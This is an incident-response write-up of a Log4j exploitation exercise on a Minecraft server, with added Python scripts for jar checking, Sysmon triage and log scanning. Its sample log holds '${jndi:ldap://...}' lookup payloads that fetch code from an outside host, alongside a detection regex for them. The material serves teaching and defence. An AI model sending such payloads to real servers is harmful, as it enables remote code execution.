Incident Response: Analyzing Log4j RCE exploited via Minecraft game

CyberJunnkie, published in System Weakness, Sep 28, 2022 (6 min read)

We have an incident related to Log4j activity, escalated by an L1 analyst.

Vulnerability

Log4j2 versions 2.0-beta9 through 2.15.0 (excluding 2.12.x after 2.12.1) are vulnerable to remote code execution through its LDAP (Lightweight Directory Access Protocol) JNDI parser. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The initial vulnerability, designated CVE-2021-44228, was supposedly fixed in versions 2.12.2 and 2.15.0. The fix disables JNDI by default and restricts LDAP access via JNDI in log4j2's named object lookup and JNDI manager.
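A practical first check on any Java host during this kind of incident is whether the deployed log4j-core jar falls in the range above and still ships the JndiLookup class (removing that class from the jar was the widely published interim mitigation). The script below is an added example, not code from the original post or from the LetsDefend exercise; it applies exactly the version range the paragraph above states (2.0-beta9 through 2.15.0, excluding 2.12.x after 2.12.1) and reads the version from the jar's Maven `pom.properties`. The jars it inspects are constructed in memory so it runs offline.

```python
"""Check a log4j-core jar for the vulnerable version range and the JndiLookup class.

Added example, not from the original post. The version range is the one the
post quotes; the jars inspected below are constructed stand-ins.
"""
import io
import re
import zipfile

# Paths inside a real log4j-core jar: Maven metadata and the JNDI lookup class.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)
_PRE_TIER = {"beta": 0, "rc": 1}


def parse_version(text):
    """Turn '2.0-beta9', '2.0-rc1' or '2.15.0' into a sortable tuple.

    Pre-releases sort before the final release of the same version:
    2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised log4j version: %r" % text)
    major, minor, patch, pre, pre_num = m.groups()
    if pre:
        return (int(major), int(minor), -1, _PRE_TIER[pre.lower()], int(pre_num))
    return (int(major), int(minor), int(patch or 0), 2, 0)


RANGE_LOW = parse_version("2.0-beta9")
RANGE_HIGH = parse_version("2.15.0")


def version_in_vulnerable_range(text):
    """True when the version lies in the range the advisory text gives."""
    v = parse_version(text)
    if v[:2] == (2, 12) and v[2] >= 2:  # 2.12.2 and later 2.12.x are excluded
        return False
    return RANGE_LOW <= v <= RANGE_HIGH


def read_version(zf):
    """Version from pom.properties, or None if the jar carries no Maven metadata."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def assess_jar(data):
    """Classify jar bytes as vulnerable / jndilookup_removed / version_not_in_range / unknown_version."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        version = read_version(zf)
        has_jndi = JNDI_LOOKUP in zf.namelist()
    if not has_jndi:
        status = "jndilookup_removed"
    elif version is None:
        status = "unknown_version"
    elif version_in_vulnerable_range(version):
        status = "vulnerable"
    else:
        status = "version_not_in_range"
    return {"version": version, "has_jndi_lookup": has_jndi, "status": status}


def assess_jar_file(path):
    """Convenience wrapper for a jar on disk."""
    with open(path, "rb") as fh:
        return assess_jar(fh.read())


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar; the class entry is placeholder bytes, not bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.12.2", True), ("2.16.0", True)]:
        label = "JndiLookup present" if keep else "JndiLookup removed"
        print(ver, label, "->", assess_jar(build_sample_jar(ver, keep))["status"])
```

Two caveats for real use: shaded or "fat" jars often embed log4j-core without its `pom.properties`, so `unknown_version` with the class present should be treated as needing manual review, and WAR/EAR files nest jars inside jars, so a production scanner has to recurse into zip entries.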

Investigation

We RDP into the victim host and mount our forensics tool file share alongside it, in case we need the tools.

The attacker abused the Log4j vulnerability in a Minecraft game server. The vulnerability is in a Java logging framework used in almost every application built on a Java codebase, and Minecraft is built on Java, which makes the game itself vulnerable.

Although the executed command “cmd.exe /c calc.exe” is not dangerous in itself, it is suspicious on a gaming server where there is no need for it. Adversaries also often use this command to confirm that their RCE works.

We start the IR playbook for this incident and follow the standardized procedure to complete our investigation.

We first need to verify that the alert is in fact true: that the jar file was run and that the cmd command also ran. Luckily Sysmon was installed on the endpoint, so we can go through the Sysmon logs to verify this.

We know the date and time of the incident, so we will go through the logs in that time frame. It is 11 December 2021 at around 10:40 am. We will look at Sysmon logs between 10:30 and 10:50 am to reduce the noise and speed up the analysis.

We verified the cmd execution.

Now let us verify the jar file execution.

So this is in fact a true positive, and we move on to the next step.
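The verification steps above (restrict to the incident window, confirm the jar launch, confirm the cmd execution) are what an analyst does by eye in Event Viewer; the script below does the same over exported Sysmon Event ID 1 records and additionally rebuilds the parent chain so the shell can be tied back to java.exe. It is an added example, not code from the original post or the exercise. The events are constructed sample data in a flat dictionary shape whose keys mirror Sysmon's UtcTime, ProcessId, ParentProcessId, Image, ParentImage and CommandLine fields; a real export (wevtutil, EvtxECmd) would be mapped onto those keys first. The jar name, PIDs and paths are made up.

```python
"""Triage Sysmon process-creation events (Event ID 1) inside an incident window.

Added example, not from the original post. SAMPLE_EVENTS is constructed data;
keys mirror the Sysmon Event ID 1 field names.
"""
from datetime import datetime

SYSMON_TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed events: java.exe (the game server) spawning cmd.exe, which launches
# calc.exe, plus unrelated activity before, during and after the window.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2021-12-11 10:25:03.100", "ProcessId": 4012, "ParentProcessId": 1200,
     "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe",
     "CommandLine": "C:\\Windows\\explorer.exe"},
    {"EventID": 1, "UtcTime": "2021-12-11 10:38:41.512", "ProcessId": 5120, "ParentProcessId": 4012,
     "Image": "C:\\Program Files\\Java\\bin\\java.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "java.exe -jar server.jar"},
    {"EventID": 1, "UtcTime": "2021-12-11 10:40:12.004", "ProcessId": 5388, "ParentProcessId": 5120,
     "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Java\\bin\\java.exe",
     "CommandLine": "cmd.exe /c calc.exe"},
    {"EventID": 1, "UtcTime": "2021-12-11 10:40:12.310", "ProcessId": 5402, "ParentProcessId": 5388,
     "Image": "C:\\Windows\\System32\\calc.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "calc.exe"},
    {"EventID": 1, "UtcTime": "2021-12-11 10:45:00.000", "ProcessId": 5600, "ParentProcessId": 4012,
     "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 1, "UtcTime": "2021-12-11 10:55:30.000", "ProcessId": 5900, "ParentProcessId": 900,
     "Image": "C:\\Windows\\System32\\taskhostw.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "taskhostw.exe"},
]


def parse_utc(text):
    return datetime.strptime(text, SYSMON_TIME_FMT)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def process_creations(events):
    return [ev for ev in events if ev.get("EventID") == 1]


def events_in_window(events, start, end):
    """Event ID 1 records whose UtcTime lies within [start, end] (Sysmon-format strings)."""
    lo, hi = parse_utc(start), parse_utc(end)
    return [ev for ev in process_creations(events) if lo <= parse_utc(ev["UtcTime"]) <= hi]


def ancestry(event, events):
    """Image basenames from the event's process up to the root, leaf first.

    Parents are resolved through ParentProcessId; when the parent's own creation
    event is not in the set, the ParentImage Sysmon stamped on the child is used
    as the last link. Windows reuses PIDs, so on a long export key on
    ProcessGuid/ParentProcessGuid instead of PIDs alone.
    """
    by_pid = {ev["ProcessId"]: ev for ev in process_creations(events)}
    chain = [basename(event["Image"])]
    seen = {event["ProcessId"]}
    cur = event
    while True:
        ppid = cur["ParentProcessId"]
        if ppid in seen:  # PID loop from reuse: stop rather than spin
            break
        parent = by_pid.get(ppid)
        if parent is None:
            chain.append(basename(cur["ParentImage"]))
            break
        seen.add(ppid)
        chain.append(basename(parent["Image"]))
        cur = parent
    return chain


def triage(events, start, end):
    """Verify the alert: jar launches and shells spawned by java.exe within the window."""
    window = events_in_window(events, start, end)
    jar_launches = [ev for ev in window
                    if basename(ev["Image"]) == "java.exe" and "-jar" in ev["CommandLine"].lower()]
    findings = []
    for ev in window:
        if basename(ev["Image"]) in SHELLS and basename(ev["ParentImage"]) == "java.exe":
            findings.append({
                "time": ev["UtcTime"],
                "command_line": ev["CommandLine"],
                "chain": ancestry(ev, events),
                "children": [basename(c["Image"]) for c in process_creations(events)
                             if c["ParentProcessId"] == ev["ProcessId"]],
            })
    return {"events_in_window": len(window), "jar_launches": jar_launches, "shell_from_java": findings}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS, "2021-12-11 10:30:00.000", "2021-12-11 10:50:00.000")
    print("events in window:", result["events_in_window"])
    for f in result["shell_from_java"]:
        print(f["time"], f["command_line"], "chain:", " <- ".join(f["chain"]), "children:", f["children"])
```

A shell whose parent is the game server's java.exe is the detection that matters here, independent of what the shell then ran; calc.exe is only the attacker's proof of execution, so the same rule catches a later, less benign payload.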

Our next task is to verify the initial access tactic.

This is a Minecraft server open to the external internet, meaning any player can join the Minecraft lobby.

We can look at the Minecraft log file for more information.

We can see that two users logged into the game lobby around the time of the incident.

We can also see this in the log management tab in our SIEM.

I checked these IP reputations, but both were clean and had a good reputation.

But if we look further into the logs, we can see that suspicious actions were carried out by user “TestUser23”.

The user issued some kind of LDAP network connection to some (obviously malicious) files and then disconnected from the game. Again, the IP from which the LDAP connection was made was clean, but this is obvious Log4j exploitation, since the exploit depends on malicious Java class files served from attacker-controlled LDAP servers. Two class files were contacted (exploit.class and exploit2.class).
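The Minecraft log review above (who logged in, from which IP, who sent a JNDI lookup string and then disconnected) can be scripted so the same timeline is produced for every player rather than read by eye. The parser below is an added example, not code from the original post or the exercise. The log lines are constructed in the vanilla server's `latest.log` layout, the IPs come from documentation ranges, the lookup paths reuse the class names the post mentions, and the only pattern matched is the plain `${jndi:...}` lookup syntax of CVE-2021-44228.

```python
"""Scan a Minecraft server log for players who sent JNDI lookup strings.

Added example, not from the original post. SAMPLE_LOG is constructed; the IPs
and port are placeholders.
"""
import re

LINE_RE = re.compile(r"^\[(?P<time>\d\d:\d\d:\d\d)\] \[(?P<thread>[^/\]]+)/(?P<level>[A-Z]+)\]: (?P<msg>.*)$")
LOGIN_RE = re.compile(r"^(?P<user>\S+)\[/(?P<ip>[\d.]+):(?P<port>\d+)\] logged in")
CHAT_RE = re.compile(r"^<(?P<user>[^>]+)> (?P<text>.*)$")
LEAVE_RE = re.compile(r"^(?P<user>\S+) (?:left the game|lost connection)")
# The lookup syntax itself: ${jndi:<scheme>://host[:port][/path]}
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:\s*//(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?",
    re.IGNORECASE)

SAMPLE_LOG = """\
[10:38:55] [Server thread/INFO]: Player1[/203.0.113.10:54321] logged in with entity id 201 at (12.5, 64.0, -30.2)
[10:39:02] [Server thread/INFO]: TestUser23[/198.51.100.7:50123] logged in with entity id 202 at (0.5, 64.0, 0.5)
[10:39:30] [Server thread/INFO]: <Player1> hello everyone
[10:40:09] [Server thread/INFO]: <TestUser23> ${jndi:ldap://198.51.100.7:1389/exploit}
[10:40:09] [Server thread/INFO]: <TestUser23> ${jndi:ldap://198.51.100.7:1389/exploit2}
[10:40:10] [Server thread/INFO]: TestUser23 lost connection: Disconnected
[10:40:10] [Server thread/INFO]: TestUser23 left the game
[10:41:00] [Server thread/INFO]: <Player1> anyone there?
"""


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def _new_player():
    return {"ip": None, "login": None, "lookups": [], "left": None}


def analyse(log_text):
    """Per-player timeline: login IP, JNDI lookups (time, scheme, host, port, path) and disconnect."""
    players = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        msg, when = rec["msg"], rec["time"]
        login, chat, leave = LOGIN_RE.match(msg), CHAT_RE.match(msg), LEAVE_RE.match(msg)
        if login:
            p = players.setdefault(login["user"], _new_player())
            p["ip"], p["login"] = login["ip"], when
        if leave and leave["user"] in players:
            players[leave["user"]]["left"] = when
        # Scan every logged message, not only chat: a lookup string can arrive in any
        # field the server logs. Attribute it to the chatting or logging-in player when known.
        for j in JNDI_RE.finditer(msg):
            user = chat["user"] if chat else (login["user"] if login else "<unattributed>")
            players.setdefault(user, _new_player())["lookups"].append({
                "time": when, "scheme": j["scheme"].lower(), "host": j["host"],
                "port": j["port"], "path": j["path"]})
    return players


def suspicious_players(players):
    """Players with at least one lookup attempt; the IP and disconnect time go into the IR notes."""
    return {u: p for u, p in players.items() if p["lookups"]}


def lookup_hosts(players):
    """Distinct (host, port) pairs contacted, i.e. the candidate attacker LDAP/RMI servers to block."""
    return sorted({(l["host"], l["port"]) for p in players.values() for l in p["lookups"]})


if __name__ == "__main__":
    found = suspicious_players(analyse(SAMPLE_LOG))
    for user, p in found.items():
        print(user, "from", p["ip"], "left at", p["left"])
        for l in p["lookups"]:
            print("  ", l["time"], l["scheme"], l["host"], l["port"], l["path"])
    print("hosts to block:", lookup_hosts(analyse(SAMPLE_LOG)))
```

The `(host, port)` list is what feeds the egress block and the IOC notes later in the playbook; the player's source IP, as the post observed, may well have a clean reputation and is a weaker indicator than the server the lookup pointed at.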

So we can select external remote services as the answer.

If you do a little research on the CVE in question, you find that the exploit was in a parser for log files. This parser belongs to a Java-based utility called Log4j, used in almost every Java-based application (hence the name Log4j RCE).

Our next question was whether privilege escalation occurred.

The attacker got RCE as user “LetsDefend”, which is already in the Administrators group, so no privilege escalation was required.

Our next question is whether any persistence was established.

We check whether any users have been created.

Now we check for any suspicious scheduled tasks.

All of these tasks belong to the training exercise and none are malicious, so it is safe to ignore them.

So we can say that no persistence was established.

The next question is regarding credential access. Since no alert was raised (for an LSASS dump or Mimikatz) and no evidence was found on the endpoint, we can select none as the answer. In real life we would hunt for threats fully using multiple tools, but this exercise simulates an immediate response to Log4j exploitation.

Since it is safe to assume that the Minecraft server was vulnerable and was successfully exploited, we need to isolate the device to cut off lateral movement and perform forensics (in a real scenario).

We now contain the endpoint from endpoint management.

In real life, after performing forensics and collecting artifacts, we would want to back up important files, wipe the disks and completely reinstall the OS in case of any rootkits.

Finally, recovery is carried out to remediate the threat and restore continuous service.

Now we take notes on all IOCs and artifacts found during the investigation.

We write up our IR investigation notes and close the alert.

We got all our answers correct except the initial access method. We concluded that initial access was made via external remote services (public Minecraft server), but it turns out that the correct answer is public application exploited (which is much the same thing as what we selected; in real life this would have been fine, since it was exploited remotely from the internet).
